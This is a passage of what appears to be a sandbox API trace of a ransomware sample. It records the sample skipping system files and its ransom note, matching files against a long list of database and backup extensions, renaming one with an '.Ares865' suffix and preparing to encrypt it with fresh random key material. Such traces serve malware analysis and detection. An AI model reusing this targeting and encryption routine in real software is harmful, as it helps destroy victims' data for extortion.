CloseHandle (hObject=0x15c) returned 1 [0087.604] CloseHandle (hObject=0x118) returned 1 [0087.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.605] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x17960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="..") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="windows") returned -1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="temp") returned -1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="boot") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0087.605] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0087.605] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0087.605] lstrcpyW (in: lpString1=0x2cce468, lpString2="MSOINTL.DLL.trx_dll" | out: lpString1="MSOINTL.DLL.trx_dll") returned="MSOINTL.DLL.trx_dll" [0087.605] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0087.605] lstrlenW (lpString="Ares865") returned 7 [0087.605] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.605] lstrlenW (lpString=".dll") returned 4 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0087.605] lstrlenW (lpString=".lnk") returned 4 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.605] lstrlenW (lpString=".ini") returned 4 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0087.605] lstrlenW (lpString=".sys") returned 4 [0087.605] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0087.605] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0087.605] lstrlenW (lpString="bak") returned 3 [0087.605] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.605] lstrlenW (lpString="ba_") returned 3 [0087.605] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.605] lstrlenW (lpString="dbb") returned 3 [0087.605] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.605] lstrlenW (lpString="vmdk") returned 4 [0087.605] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.605] lstrlenW (lpString="rar") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.606] lstrlenW (lpString="zip") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.606] lstrlenW (lpString="tgz") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.606] lstrlenW (lpString="vbox") returned 4 [0087.606] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.606] lstrlenW (lpString="vdi") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.606] lstrlenW (lpString="vhd") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.606] lstrlenW (lpString="vhdx") returned 4 [0087.606] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.606] lstrlenW (lpString="avhd") returned 4 [0087.606] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.606] lstrlenW (lpString="db") returned 2 [0087.606] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.606] lstrlenW (lpString="db2") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.606] lstrlenW (lpString="db3") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.606] lstrlenW (lpString="dbf") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.606] lstrlenW (lpString="mdf") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.606] lstrlenW (lpString="mdb") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.606] lstrlenW (lpString="sql") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.606] lstrlenW (lpString="sqlite") returned 6 [0087.606] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.606] lstrlenW (lpString="sqlite3") returned 7 [0087.606] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.606] lstrlenW (lpString="sqlitedb") returned 8 [0087.606] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.606] lstrlenW (lpString="xml") returned 3 [0087.606] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.606] lstrlenW (lpString="$er") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.607] lstrlenW (lpString="4dd") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.607] lstrlenW (lpString="4dl") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.607] lstrlenW (lpString="^^^") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.607] lstrlenW (lpString="abs") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.607] lstrlenW (lpString="abx") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.607] lstrlenW (lpString="accdb") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.607] lstrlenW (lpString="accdc") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.607] lstrlenW (lpString="accde") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.607] lstrlenW (lpString="accdr") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.607] lstrlenW (lpString="accdt") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.607] lstrlenW (lpString="accdw") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.607] lstrlenW (lpString="accft") returned 5 [0087.607] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.607] lstrlenW (lpString="adb") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.607] lstrlenW (lpString="adb") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.607] lstrlenW (lpString="ade") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.607] lstrlenW (lpString="adf") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.607] lstrlenW (lpString="adn") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.607] lstrlenW (lpString="adp") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.607] lstrlenW (lpString="alf") returned 3 [0087.607] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.608] lstrlenW (lpString="ask") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.608] lstrlenW (lpString="btr") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.608] lstrlenW (lpString="cat") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.608] lstrlenW (lpString="cdb") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.608] lstrlenW (lpString="ckp") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.608] lstrlenW (lpString="cma") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.608] lstrlenW (lpString="cpd") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.608] lstrlenW (lpString="dacpac") returned 6 [0087.608] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.608] lstrlenW (lpString="dad") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.608] lstrlenW (lpString="dadiagrams") returned 10 [0087.608] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.608] lstrlenW (lpString="daschema") returned 8 [0087.608] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.608] lstrlenW (lpString="db-journal") returned 10 [0087.608] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.608] lstrlenW (lpString="db-shm") returned 6 [0087.608] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.608] lstrlenW (lpString="db-wal") returned 6 [0087.608] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.608] lstrlenW (lpString="dbc") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.608] lstrlenW (lpString="dbs") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.608] lstrlenW (lpString="dbt") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.608] lstrlenW (lpString="dbv") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.608] lstrlenW (lpString="dbx") returned 3 [0087.608] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.609] lstrlenW (lpString="dcb") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.609] lstrlenW (lpString="dct") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.609] lstrlenW (lpString="dcx") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.609] lstrlenW (lpString="ddl") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.609] lstrlenW (lpString="dlis") returned 4 [0087.609] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.609] lstrlenW (lpString="dp1") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.609] lstrlenW (lpString="dqy") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.609] lstrlenW (lpString="dsk") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.609] lstrlenW (lpString="dsn") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.609] lstrlenW (lpString="dtsx") returned 4 [0087.609] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.609] lstrlenW (lpString="dxl") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.609] lstrlenW (lpString="eco") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.609] lstrlenW (lpString="ecx") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.609] lstrlenW (lpString="edb") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.609] lstrlenW (lpString="epim") returned 4 [0087.609] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.609] lstrlenW (lpString="fcd") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.609] lstrlenW (lpString="fdb") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.609] lstrlenW (lpString="fic") returned 3 [0087.609] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.609] lstrlenW (lpString="flexolibrary") returned 12 [0087.609] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.609] lstrlenW (lpString="fm5") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.610] lstrlenW (lpString="fmp") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.610] lstrlenW (lpString="fmp12") returned 5 [0087.610] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.610] lstrlenW (lpString="fmpsl") returned 5 [0087.610] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.610] lstrlenW (lpString="fol") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.610] lstrlenW (lpString="fp3") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.610] lstrlenW (lpString="fp4") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.610] lstrlenW (lpString="fp5") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.610] lstrlenW (lpString="fp7") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.610] lstrlenW (lpString="fpt") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.610] lstrlenW (lpString="frm") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.610] lstrlenW (lpString="gdb") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.610] lstrlenW (lpString="gdb") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.610] lstrlenW (lpString="grdb") returned 4 [0087.610] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.610] lstrlenW (lpString="gwi") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.610] lstrlenW (lpString="hdb") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.610] lstrlenW (lpString="his") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.610] lstrlenW (lpString="ib") returned 2 [0087.610] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.610] lstrlenW (lpString="idb") returned 3 [0087.610] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.610] lstrlenW (lpString="ihx") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.611] lstrlenW (lpString="itdb") returned 4 [0087.611] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.611] lstrlenW (lpString="itw") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.611] lstrlenW (lpString="jet") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.611] lstrlenW (lpString="jtx") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.611] lstrlenW (lpString="kdb") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.611] lstrlenW (lpString="kexi") returned 4 [0087.611] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.611] lstrlenW (lpString="kexic") returned 5 [0087.611] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.611] lstrlenW (lpString="kexis") returned 5 [0087.611] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.611] lstrlenW (lpString="lgc") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.611] lstrlenW (lpString="lwx") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.611] lstrlenW (lpString="maf") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.611] lstrlenW (lpString="maq") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.611] lstrlenW (lpString="mar") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.611] lstrlenW (lpString="marshal") returned 7 [0087.611] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.611] lstrlenW (lpString="mas") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.611] lstrlenW (lpString="mav") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.611] lstrlenW (lpString="maw") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.611] lstrlenW (lpString="mdbhtml") returned 7 [0087.611] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.611] lstrlenW (lpString="mdn") returned 3 [0087.611] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.612] lstrlenW (lpString="mdt") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.612] lstrlenW (lpString="mfd") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.612] lstrlenW (lpString="mpd") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.612] lstrlenW (lpString="mrg") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.612] lstrlenW (lpString="mud") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.612] lstrlenW (lpString="mwb") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.612] lstrlenW (lpString="myd") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.612] lstrlenW (lpString="ndf") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.612] lstrlenW (lpString="nnt") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.612] lstrlenW (lpString="nrmlib") returned 6 [0087.612] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.612] lstrlenW (lpString="ns2") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.612] lstrlenW (lpString="ns3") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.612] lstrlenW (lpString="ns4") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.612] lstrlenW (lpString="nsf") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.612] lstrlenW (lpString="nv") returned 2 [0087.612] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.612] lstrlenW (lpString="nv2") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.612] lstrlenW (lpString="nwdb") returned 4 [0087.612] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.612] lstrlenW (lpString="nyf") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.612] lstrlenW (lpString="odb") returned 3 [0087.612] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.613] lstrlenW (lpString="odb") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.613] lstrlenW (lpString="oqy") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.613] lstrlenW (lpString="ora") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.613] lstrlenW (lpString="orx") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.613] lstrlenW (lpString="owc") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.613] lstrlenW (lpString="p96") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.613] lstrlenW (lpString="p97") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.613] lstrlenW (lpString="pan") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.613] lstrlenW (lpString="pdb") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.613] lstrlenW (lpString="pdm") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.613] lstrlenW (lpString="pnz") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.613] lstrlenW (lpString="qry") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.613] lstrlenW (lpString="qvd") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.613] lstrlenW (lpString="rbf") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.613] lstrlenW (lpString="rctd") returned 4 [0087.613] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.613] lstrlenW (lpString="rod") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.613] lstrlenW (lpString="rodx") returned 4 [0087.613] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.613] lstrlenW (lpString="rpd") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.613] lstrlenW (lpString="rsd") returned 3 [0087.613] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.613] lstrlenW (lpString="sas7bdat") returned 8 [0087.614] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.614] lstrlenW (lpString="sbf") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.614] lstrlenW (lpString="scx") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.614] lstrlenW (lpString="sdb") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.614] lstrlenW (lpString="sdc") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.614] lstrlenW (lpString="sdf") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.614] lstrlenW (lpString="sis") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.614] lstrlenW (lpString="spq") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.614] lstrlenW (lpString="te") returned 2 [0087.614] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.614] lstrlenW (lpString="teacher") returned 7 [0087.614] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.614] lstrlenW (lpString="tmd") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.614] lstrlenW (lpString="tps") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.614] lstrlenW (lpString="trc") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.614] lstrlenW (lpString="trc") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.614] lstrlenW (lpString="trm") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.614] lstrlenW (lpString="udb") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.614] lstrlenW (lpString="udl") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.614] lstrlenW (lpString="usr") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.614] lstrlenW (lpString="v12") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.614] lstrlenW (lpString="vis") returned 3 [0087.614] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.615] lstrlenW (lpString="vpd") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.615] lstrlenW (lpString="vvv") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.615] lstrlenW (lpString="wdb") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.615] lstrlenW (lpString="wmdb") returned 4 [0087.615] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.615] lstrlenW (lpString="wrk") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.615] lstrlenW (lpString="xdb") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.615] lstrlenW (lpString="xld") returned 3 [0087.615] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.615] lstrlenW (lpString="xmlff") returned 5 [0087.615] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.615] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.Ares865") returned 79 [0087.615] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.616] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.616] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96608) returned 1 [0087.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.616] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.618] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17c60, lpName=0x0) returned 0x15c [0087.619] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17c60) returned 0x190000 [0087.624] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, 